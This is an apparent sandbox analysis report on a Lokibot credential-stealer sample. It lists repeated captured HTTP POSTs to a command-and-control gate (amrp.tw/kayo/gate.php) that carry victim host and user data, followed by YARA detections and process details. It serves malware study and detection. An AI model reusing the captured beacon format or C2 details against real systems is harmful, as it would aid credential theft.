                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 68 | Source IP: 192.168.2.3 | Source Port: 49806 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:15.758589983 CEST | 6105 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:16.005445957 CEST | 6105 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:16.469253063 CEST | 6105 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 69 | Source IP: 192.168.2.3 | Source Port: 49807 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:17.017693043 CEST | 6106 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:17.263936043 CEST | 6106 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:17.732038021 CEST | 6107 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 7 | Source IP: 192.168.2.3 | Source Port: 49733 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:18:53.571367979 CEST | 1164 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:53.817255020 CEST | 1165 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:54.494051933 CEST | 1165 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 70 | Source IP: 192.168.2.3 | Source Port: 49808 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:18.222249031 CEST | 6107 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:18.467852116 CEST | 6108 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:19.481174946 CEST | 6108 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 71 | Source IP: 192.168.2.3 | Source Port: 49809 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:19.971364975 CEST | 6109 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:20.217267990 CEST | 6109 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:20.682220936 CEST | 6109 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:21 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 72 | Source IP: 192.168.2.3 | Source Port: 49810 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:21.190798998 CEST | 6110 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:21.435870886 CEST | 6110 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:21.917289019 CEST | 6111 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 73 | Source IP: 192.168.2.3 | Source Port: 49811 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:22.423304081 CEST | 6112 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:22.669348955 CEST | 6112 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:23.374578953 CEST | 6112 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 74 | Source IP: 192.168.2.3 | Source Port: 49812 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:23.869111061 CEST | 6113 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:24.118428946 CEST | 6113 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:24.587765932 CEST6113INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            75 | 192.168.2.3 | 49813 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:25.087244987 CEST | 6114 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:25.335743904 CEST | 6115 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:25.805234909 CEST | 6115 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            76 | 192.168.2.3 | 49814 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:26.307610989 CEST | 6116 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:26.553095102 CEST | 6116 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:27.024369001 CEST | 6116 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            77 | 192.168.2.3 | 49815 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:27.531953096 CEST | 6117 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:27.778146029 CEST | 6117 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:28.247987032 CEST | 6118 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            78 | 192.168.2.3 | 49816 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:28.741976023 CEST | 6118 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:28.987257957 CEST | 6119 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:29.459114075 CEST | 6119 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            79 | 192.168.2.3 | 49817 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:29.941660881 CEST | 6120 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:30.191807032 CEST | 6120 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:30.664474010 CEST | 6120 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            8 | 192.168.2.3 | 49734 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:18:55.018479109 CEST | 1195 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:55.267853975 CEST | 1208 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:55.731251955 CEST | 1208 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            80 | 192.168.2.3 | 49818 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:31.136632919 CEST | 6121 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:31.382211924 CEST | 6121 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:31.850343943 CEST | 6122 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            9 | 192.168.2.3 | 49738 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:18:56.255489111 CEST | 1231 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:56.501069069 CEST | 1231 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:56.963195086 CEST | 1231 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Memory Usage

                                            High Level Behavior Distribution

                                            Behavior

                                            System Behavior

                                            General

                                            Start time: 09:18:24
                                            Start date: 29/04/2021
                                            Path: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Wow64 process (32bit): true
                                            Commandline: 'C:\Users\user\Desktop\FJbeidnZOF.exe'
                                            Imagebase: 0x120000
                                            File size: 653824 bytes
                                            MD5 hash: 0B43C829AF2EB773A3614B02BA5B8C5F
                                            Has elevated privileges: true
                                            Has administrator privileges: true
                                            Programmed in: .Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation: low

                                            General

                                            Start time: 09:18:37
                                            Start date: 29/04/2021
                                            Path: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Wow64 process (32bit): true
                                            Commandline: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Imagebase: 0x540000
                                            File size: 653824 bytes
                                            MD5 hash: 0B43C829AF2EB773A3614B02BA5B8C5F
                                            Has elevated privileges: true
                                            Has administrator privileges: true
                                            Programmed in: C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation: low

                                            Disassembly

                                            Code Analysis

                                              Executed Functions

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0c6e73420aca15fdca9da6d6e18f85bc4dc174b01022ddd57eb970a43782e62
                                              • Instruction ID: a21d8d946d66025d0d6e0ece525d86b0d9a49331e75b6e9815c75505eb599502
                                              • Opcode Fuzzy Hash: f0c6e73420aca15fdca9da6d6e18f85bc4dc174b01022ddd57eb970a43782e62
                                              • Instruction Fuzzy Hash: A6528D32A00619CFCB15CF68C884BAEB7B6FF85304F5584A9E919AB251D774FD85CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
